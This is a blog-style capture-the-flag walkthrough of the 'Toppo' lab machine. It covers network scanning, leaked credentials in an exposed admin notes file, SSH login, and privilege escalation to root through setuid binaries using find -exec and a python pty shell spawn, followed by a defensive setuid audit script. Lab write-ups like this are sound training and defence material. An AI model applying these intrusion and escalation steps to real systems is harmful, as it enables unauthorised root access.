Friday, September 18, 2020

CTF Machine - Toppo

 ﷽

Machine : Toppo
Duration :  15-20 Minutes (approximately)

Meet Toppo ...

1. Preparation :

Check my own IP.
ifconfig


Discover the neighbours' IPs.
nmap -sn 192.168.56.0/24


2. Enumeration :

nmap -sC -A -p- 192.168.56.105



Found several open ports: 22, 80, 111 & 58733. Let's try browsing the web server service (tcp/80) :

Also tried viewing the page source, looking for some interesting information, but no luck.


Meanwhile ... also look for any possible exploits for the identified services :

OpenSSH 6.7P1 (tcp/22) :

Apache httpd 2.4.10 (tcp/80) :


Examine the web server : nikto -host http://192.168.56.105
and found the admin directory and then mail.


Accessing the admin directory, which is in listing mode :

Inside the admin directory, we found a text file, notes.txt, which might contain user and password information.
Possible user and password information :
User : ted
Password : 12345ted123

Inside the mail directory, we found a .php file which only returns No arguments Provided!

Accessing the machine over the ssh service, we got low-level shell access.


Identifying system : uname -a and cat /etc/issue.net


Searching for usable setuid executable files that user ted is allowed to run.
find / -perm -u=s 2>/dev/null


Python is a potential escalation vector, but first let's try using find.
find / -name sp8 -exec /bin/bash \; or find / -name sp8 -exec /bin/sh \;


The attempt using find failed, so let's try the well-known python shell spawn.
We can use a python one-liner like python -c 'import pty; pty.spawn("/bin/sh")' or run a python script.
echo 'import pty; pty.spawn("/bin/sh")' > sp8.py
python sp8.py



And we got root; flag.txt can simply be found in the /root directory.
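
The find / -perm -u=s step above doubles as a hardening check: a setuid bit on an interpreter such as python hands its owner's privileges to any local user. The script below is an added example, not part of the original walkthrough; the function names and the list of flagged program names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid files and flag the ones
# that are interpreters or can run arbitrary commands.
# The pattern list below is an illustrative assumption, not exhaustive.

# is_risky NAME: succeeds if the file name matches a shell-capable program.
is_risky() {
    case "$1" in
        python*|perl*|ruby*|php*|lua*|node|bash|dash|sh|zsh|ksh) return 0 ;;
        find|awk|gawk|mawk|vi|vim*|env|nmap) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_suid ROOT: print one line per setuid regular file under ROOT.
# -perm -4000 is the numeric form of the -perm -u=s test used above.
audit_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        if is_risky "$(basename "$f")"; then
            printf 'FLAG %s\n' "$f"   # remediate: chmod u-s "$f"
        else
            printf 'ok   %s\n' "$f"   # still review against the distro baseline
        fi
    done
}

# Usage: sh audit_suid.sh /    (run as root so no directory is skipped)
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Every FLAG line is a file whose setuid bit should be removed unless there is a documented reason to keep it.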

Finish ...

Thank you and Greets Hadi Mene.
